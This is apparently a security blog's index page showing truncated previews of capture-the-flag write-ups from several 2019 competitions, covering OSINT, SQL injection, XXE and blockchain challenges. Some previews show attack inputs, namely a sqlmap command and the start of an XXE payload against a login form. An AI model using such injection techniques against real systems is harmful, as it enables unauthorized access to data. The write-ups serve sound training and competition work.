ArcticCon 2019 CTF

Arcticcon is a conference by red teamers, for red teamers...and I was lucky enough to attend and participate in their 2019 CTF.


First of all, the conference was amazing. The first day was dedicated to the CTF, the second day had a focus on training/labs, and the third day was loaded with presentations that were all informative, inspiring, and packed full of tips, tricks, tools, and advice that I could actually use in my day-to-day.

The CTF had three main components to it, with SE being peppered in as well:
OSINTPhysicalNetpen I was assigned to team IronMan, along with five others.
OSINT On May 2nd, 2019, the CTF opened up for teams to begin working on the OSINT challenges. 
The Jeopardy style challenge board gave no hints and asked no questions.
Here is an example of a challenge:
Challenge Three

I began this CTF with some bad assumptions concerning when it was held last year, so shortly after I began my hunt for OSINT, I started submitting flags from last years challenges. Th…

2019 Stonecutters - Bleeding Gums

In honor of Bleeding Gums Murphy, who passed away 24 years ago today; I thought it would be nice to pay tribute to him by publishing my write-up for the Stonecutter's "Bleeding Gums"challenge.

RIP Bleeding Gums
Bleeding Gums was an empty website aside from a single search field as seen below:

When I searched for the letter "a", I saw the table below:

Search Results
When I searched for the letter "b", I saw a smaller data set returned and some of the artists were different.

Next, I searched for years and album titles but the query only seemed to search for Artists.
Searching for ' gave me the following SQL error:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')'' at line 1

I threw sqlmap at it but I wasn't able to get anything out of it. I then started to play with the injection manually.

With this particular challenge, I notice…

2019 Stonecutters - Fink Does Yoga

The "Fink Does Yoga" website was a very basic login form to schedule a yoga class. No matter what you entered as credentials, the username was reflected back to the user on the next page that loaded and the password given didn't really seem to matter. I started this challenge fuzzing bad characters to find some kind of injection vulnerability.

I found that entering a "<" as the username gave me an interesting error. Seen below is the complete response:

Warning: DOMDocument::loadXML(): StartTag: invalid element name in Entity, line: 1 in /app/web/login.php on line 22
Warning: simplexml_import_dom(): Invalid Nodetype to import in /app/web/login.php on line 24 Hi there, ! Welcome back. Calendar No spots are available at the moment. Please check back later. 
I noticed XML errors in this output so I tried the following XXE injection attack against the username field:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT f…

2019 Stonecutters - Easy Drinking Duff

Easy Drinking Duff was the first and easiest web app challenge that the Stonecutters had on the board. By the time I got around to it, it was only worth 75 points and it had the most solves of all the web app challenges.

In order to access the challenge, I needed to register my SSH key with the scoring server and run a provided SSH command to access the challenge. I was then able to load the following site by pointing my browser to

Easy Drinking Duff

I then sorted the data set by year by clicking on the "Year" column header which sent a request for:
This just screamed database, so I entered a ' at the end of year to see what would happen and I saw the following error message:

SQL Error
This indicated a SQLi vulnerability so I ran sqlmap, as seen below, to validate the finding by checking who the current-user was:

# sqlmap -u "*" --current-user
[13:57:38] [INFO] the b…

BHIS CTF@Shmoocon 2019 - Blockchain Challenge

I had the Blockchain Challenge, or whatever it was actually called, still kicking around even though Shmoocon and the Blackhills Infosec CTF has ended. I thought this was a neat challenge and I really wanted to figure this one out.

Here's the challenge description:

Thanks for joining our team on this one. We are so close to catching the infamous hacktivist known as "gh0st Plague".
We were informed that he is planning another DDoS attack against a major financial institution. gh0st Plague recruits various botnet owners from around the net and always pays in Bitcoin.
We believe that the following Bitcoin address is one of gh0st Plague's wallets. Knowing where and when gP is making payments should help us catch him but we need some solid evidence. This is where you come in. With your expertise in Blockchain analysis it shouldn't be too hard for you to determine if he let his ego get to him and left any clues behind. Good luck! 3AHnpGWb1EUSYKZUbgxfAkzFfmJeKLL3hH

I remembe…

Al Capwn: Evlz CTF 20190202-20190203

I recently heard of the Evlz CTF from a reddit post in /r/securityCTF by u/coffee-loop. The CTF is put on by Al Capwn, a collaboration of Indian college CTF players with members from eavesdroppers, UPES, and Amrita University. 

Holy macaroni did this competition blow me away! There were so many quality challenges I can't believe it was limited to less than 48 hours. I only had about 6 hours between Saturday and Sunday to put towards the challenges so I was only able to get a few of the "easy" ones.

They had multiple challenges for each of the following categories:
SanityMiscCryptoForensicsWebPwnReverse I have write ups for the Sanity challenges as well as two of the Misc challenges.

Let's get started:
Sanity Check 1 1 point, simply enter the flag that was set for the ctf channel in the evlzctf slack workspace.
Sanity Check 2 50 points. This challenge provided a link to the following QR code:


BHIS CTF@Shmoocon 2019 - Feeling Blue?

I was lucky enough to score tickets to Shmoocon again and of course I was looking forward to working on a CTF while I was there. Black Hills Information Security had organized a CTF to run at Shmoo which made me super happy as I have a lot of respect for them and was excited to see what they had in store for us players.

Unfortunately, I had to work most of Friday and leave first thing Sunday morning. This left me with only a handful of hours on Saturday to compete as I balanced my time with other con activities.

My coworker, Wole, joined the team and together we reached as high as 13th place in just a few hours. The final scoreboard was still hidden at the time of this writing, but I have a feeling we got knocked down a few spots.

The CTF was powered by MetaCTF and the challenges were categorized as follows:
CryptographyReconnaissanceWeb ExploitationReverse EngineeringForensicsOther One challenge that I thought would make for a good blog post to write on the train home was called: &quo…